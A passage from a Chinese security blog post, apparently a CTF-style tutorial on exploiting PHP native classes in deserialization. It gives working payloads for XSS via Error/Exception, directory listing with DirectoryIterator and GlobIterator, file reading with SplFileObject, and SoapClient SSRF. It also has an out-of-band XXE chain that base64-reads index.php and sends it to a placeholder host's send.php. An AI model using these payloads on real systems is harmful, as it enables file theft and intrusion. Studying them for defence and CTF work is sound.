id=\"u287defdd\">\u6210\u529f\u89e6\u53d1$profile-&gt;pass==&#8217;escaping&#8217;\u540e\u9762\u7684\u4ee3\u7801<\/p>\n\n\n\n<p id=\"ubaf69a95\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-1024x248.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"248\" data-attachment-id=\"109\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=109\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79.png\" data-orig-size=\"1920,465\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-300x73.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-1024x248.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-79-1024x248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-109\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"xQEYi\">php\u5e38\u89c1\u539f\u751f\u7c7b\u603b\u7ed3<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"HHY2O\">\u63a2\u6d4b\u539f\u751f\u7c7b<\/h4>\n\n\n\n<p id=\"u3c89b325\">\u8fd9\u6bb5\u4ee3\u7801\u53ef\u4ee5\u63a2\u6d4b\u5f53\u524dphp\u73af\u5883\u52a0\u8f7d\u7684\u539f\u751f\u7c7b<\/p>\n\n\n\n<pre id=\"b4DKF\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = get_declared_classes();\nforeach ($Phantom as $Phantom1) {\n    $Phantom2 = get_class_methods($Phantom1);\n    foreach ($Phantom2 as $Phantom3) {\n        if (in_array($Phantom3, array('__destruct', '__toString', '__wakeup', '__call', '__callStatic'))) {\n            print $Phantom1 . '::' . $Phantom3 . \"\\n\";\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"110\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=110\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-80-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-110\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"NuG9P\">\u5e38\u7528\u53ef\u5229\u7528\u539f\u751f\u7c7b\u5217\u8868<\/h4>\n\n\n\n<pre id=\"aBfG4\" class=\"wp-block-code\"><code>Exception\/Error\u7cfb\u5217\uff1aException, Error, ErrorException, \u5404\u7c7bRuntimeException\n\u6587\u4ef6\u64cd\u4f5c\u7c7b\uff1aDirectoryIterator, FilesystemIterator, SplFileObject, GlobIterator\nXML\u5904\u7406\u7c7b\uff1aSimpleXMLElement\nWeb\u670d\u52a1\u7c7b\uff1aSoapClient\n\u538b\u7f29\u7c7b\uff1aZipArchive\n\u65e5\u671f\u65f6\u95f4\u7c7b\uff1aDateTime, DateInterval\n\u53cd\u5c04\u7c7b\uff1aReflectionClass, ReflectionMethod<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"WgMp5\">XSS\uff08Error\/Exception\uff09<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"Rhs4X\">XSS Payload\u6784\u9020<\/h5>\n\n\n\n<p id=\"ub3c91f00\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u5d347861\"><code>Error<\/code> (PHP 7+)<\/p>\n\n\n\n<p id=\"u6e9eeb0d\"><code>Exception<\/code> (PHP 5\/7)<\/p>\n\n\n\n<p id=\"ua9525bd2\">\u4ee5\u53ca\u4f60\u5217\u8868\u4e2d\u7684\u5b50\u7c7b\uff1a<code>ParseError<\/code>, <code>TypeError<\/code>, <code>ArgumentCountError<\/code>, <code>ArithmeticError<\/code>, <code>DivisionByZeroError<\/code><\/p>\n\n\n\n<pre id=\"MDTES\" class=\"wp-block-code\"><code>&lt;?php\n\/\/ \u57fa\u7840XSS Payload\n$Phantom = new Error(\"&lt;script&gt;alert('Error')&lt;\/script&gt;\");\n$Phantom1 = new Exception(\"&lt;img src=x onerror=alert('Exception')&gt;\");\n\necho \"Error Payload: \" . serialize($Phantom) . \"\\n\";\necho \"Exception Payload: \" . serialize($Phantom1);\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"565\" height=\"200\" data-attachment-id=\"111\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=111\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png\" data-orig-size=\"565,200\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81-300x106.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-81.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-111\"  sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"670\" height=\"200\" data-attachment-id=\"112\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=112\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png\" data-orig-size=\"670,200\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82-300x90.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-82.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-112\"  sizes=\"auto, (max-width: 670px) 100vw, 670px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"bkoEQ\">\u6587\u4ef6\u76ee\u5f55\u904d\u5386<\/h4>\n\n\n\n<p id=\"uaa3bdb0d\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u67acf734\"><code>DirectoryIterator<\/code><\/p>\n\n\n\n<p id=\"u1e9825ab\"><code>FilesystemIterator<\/code><\/p>\n\n\n\n<p id=\"u31fed61a\"><code>GlobIterator<\/code><\/p>\n\n\n\n<p id=\"u27ebc871\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong> \u8fd9\u4e9b\u7c7b\u5b9e\u73b0\u4e86\u8fed\u4ee3\u5668\u63a5\u53e3\uff0c\u914d\u5408 PHP \u7684 <code>glob:\/\/<\/code> \u4f2a\u534f\u8bae\uff0c\u53ef\u4ee5\u67e5\u627e\u5e76\u8f93\u51fa\u6587\u4ef6\u540d\u3002<\/p>\n\n\n\n<p id=\"ud2d35f3d\"><code>DirectoryIterator<\/code> \/ <code>FilesystemIterator<\/code>: \u9700\u8981\u914d\u5408 <code>glob:\/\/<\/code> \u534f\u8bae\u6765\u5339\u914d\u901a\u914d\u7b26\u3002<\/p>\n\n\n\n<p id=\"u6cd3c095\"><code>GlobIterator<\/code>: \u81ea\u5e26 Glob \u6a21\u5f0f\u5339\u914d\uff0c\u4e0d\u9700\u8981\u4f2a\u534f\u8bae\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"aeYRN\">DirectoryIterator \/ FilesystemIterator (\u914d\u5408 glob \u534f\u8bae)<\/h5>\n\n\n\n<pre id=\"jQGps\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = new DirectoryIterator(\"glob:\/\/\/*\");\nforeach ($Phantom as $Phantom1) {\n    \/\/ \u80fd\u591f\u904d\u5386\u8f93\u51fa\u6240\u6709\u5339\u914d\u7684\u6587\u4ef6\u540d\n    echo $Phantom1 . \"\\n\";\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-1024x536.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"536\" data-attachment-id=\"113\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=113\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83.png\" data-orig-size=\"1919,1005\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-300x157.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-1024x536.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-83-1024x536.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-113\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"UoJ78\">GlobIterator (\u81ea\u5e26\u6a21\u5f0f\u5339\u914d)<\/h5>\n\n\n\n<pre id=\"f6ODC\" class=\"wp-block-code\"><code>&lt;?php\n\/\/ \u67e5\u627e\u76ee\u5f55\u4e0b\u540d\u5b57\u5305\u542b flag \u7684\u6587\u4ef6\n$Phantom = new GlobIterator(\"*flag*\");\nforeach ($Phantom as $Phantom1) {\n    echo $Phantom1 . \"\\n\";\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-1024x556.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-attachment-id=\"114\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=114\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84.png\" data-orig-size=\"1359,738\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-300x163.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-1024x556.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-84-1024x556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-114\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"VkeaI\">\u6587\u4ef6\u5185\u5bb9\u8bfb\u53d6 (SplFileObject)<\/h4>\n\n\n\n<p id=\"u6e9f8de1\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u73f67106\"><code>SplFileObject<\/code><\/p>\n\n\n\n<p id=\"u5ddf8e3b\"><code>SplTempFileObject<\/code> (\u8f83\u5c11\u7528\uff0c\u4f46\u539f\u7406\u7c7b\u4f3c)<\/p>\n\n\n\n<p id=\"u243b3b9b\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong><code>SplFileObject<\/code> \u662f\u4e3a\u6587\u4ef6\u63d0\u4f9b\u9762\u5411\u5bf9\u8c61\u63a5\u53e3\u7684\u7c7b\u3002\u5b83\u5141\u8bb8\u5c06\u6587\u4ef6\u5f53\u4f5c\u5bf9\u8c61\u6765\u5904\u7406\uff0c\u53ef\u4ee5\u76f4\u63a5\u904d\u5386\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\u3002\u8fd9\u5728\u65e0\u6cd5\u4f7f\u7528 <code>file_get_contents<\/code> \u4f46\u80fd\u53cd\u5e8f\u5217\u5316\u8be5\u7c7b\u65f6\u975e\u5e38\u6709\u7528\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"H78mN\">\u654f\u611f\u6587\u4ef6\u8bfb\u53d6<\/h5>\n\n\n\n<pre id=\"D90eL\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = new SplFileObject('C:\/Windows\/System32\/drivers\/etc\/hosts');\n\/\/ \u904d\u5386\u8bfb\u53d6\u6bcf\u4e00\u884c\nforeach ($Phantom as $Phantom1) {\n    echo $Phantom1;\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-1024x556.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-attachment-id=\"115\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=115\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85.png\" data-orig-size=\"1359,738\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-300x163.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-1024x556.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-85-1024x556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-115\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"c9nj5\">XXE (XML \u5916\u90e8\u5b9e\u4f53\u6ce8\u5165)<\/h4>\n\n\n\n<p id=\"ud397fb17\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"ucd504d2e\"><code>SimpleXMLElement<\/code><\/p>\n\n\n\n<p id=\"u76848f3b\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong><code>SimpleXMLElement<\/code> \u7528\u4e8e\u89e3\u6790 XML\u3002\u5176\u6784\u9020\u51fd\u6570\u7684\u7b2c\u4e09\u4e2a\u53c2\u6570 <code>data_is_url<\/code> \u5982\u679c\u8bbe\u7f6e\u4e3a <code>true<\/code>\uff0c\u4e14\u7cfb\u7edf\u5f00\u542f\u4e86\u5916\u90e8\u5b9e\u4f53\u52a0\u8f7d\uff08\u9700\u8981\u914d\u5408 <code>LIBXML_NOENT<\/code> \u5e38\u91cf\uff09\uff0c\u5219\u53ef\u4ee5\u53d1\u8d77\u5916\u90e8\u8bf7\u6c42\uff0c\u9020\u6210 XXE \u6216 SSRF\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-1024x389.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"389\" data-attachment-id=\"116\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=116\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86.png\" data-orig-size=\"1685,640\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-300x114.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-1024x389.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-86-1024x389.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-116\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"jgiuP\">\u8bfb\u6587\u4ef6<\/h5>\n\n\n\n<p id=\"u43340c60\">evil.xml<br><\/p>\n\n\n\n<pre id=\"tJTjR\" class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\"?&gt;  \n&lt;!DOCTYPE ANY&#91;  \n&lt;!ENTITY % remote SYSTEM \"http:\/\/xxx.xxx.xxx.xxx\/send.xml\"&gt;  \n%remote;  \n%all;  \n%send;  \n]&gt;<\/code><\/pre>\n\n\n\n<p id=\"u154223de\"><br>send.xml<br><\/p>\n\n\n\n<pre id=\"a1nQ4\" class=\"wp-block-code\"><code>&lt;!ENTITY % file SYSTEM \"php:\/\/filter\/read=convert.base64-encode\/resource=index.php\"&gt;  \n&lt;!ENTITY % all \"&lt;!ENTITY &amp;#x25; send SYSTEM 'http:\/\/xxx.xxx.xxx.xxx\/send.php?file=%file;'&gt;\"&gt;<\/code><\/pre>\n\n\n\n<p id=\"u24487291\"><br>send.php<br><\/p>\n\n\n\n<pre id=\"Kl2DI\" class=\"wp-block-code\"><code>&lt;?php   \nfile_put_contents(\"result.txt\", $_GET&#91;'file']) ;  \n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"ud2db5e78\"><br>\u6076\u610f\u4ee3\u7801<br><\/p>\n\n\n\n<pre id=\"W4a3C\" class=\"wp-block-code\"><code>$x=new SimpleXMLElement(\"http:\/\/xxx.xxx.xxx.xxx\/evil.xml\",2,true);<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"eAwob\">SSRF (SoapClient)<\/h4>\n\n\n\n<p id=\"u7d509b96\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u6c9d48a5\"><code>SoapClient<\/code><\/p>\n\n\n\n<p id=\"u88bcd8d8\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong> \u5229\u7528 <code>SoapClient<\/code> \u7684 <code>__call<\/code> \u65b9\u6cd5\u3002\u5f53\u8c03\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\uff0c<code>__call<\/code> \u4f1a\u6839\u636e\u6784\u9020\u51fd\u6570\u4e2d\u5b9a\u4e49\u7684 <code>location<\/code> \u53d1\u9001\u4e00\u4e2a SOAP \u8bf7\u6c42\uff08HTTP POST\uff09\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"C4yHW\">\u57fa\u7840 SSRF<\/h5>\n\n\n\n<pre id=\"hLuuv\" class=\"wp-block-code\"><code>&lt;?php\n$a = new SoapClient(null,array('uri'=&gt;'bbb', 'location'=&gt;'http:\/\/127.0.0.1:6888\/'));\n$b = serialize($a);\necho $b;\n$c = unserialize($b);\n$c-&gt;not_exists_function();<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"GhdP1\">CRLF \u6ce8\u5165<\/h5>\n\n\n\n<pre id=\"SKwNR\" 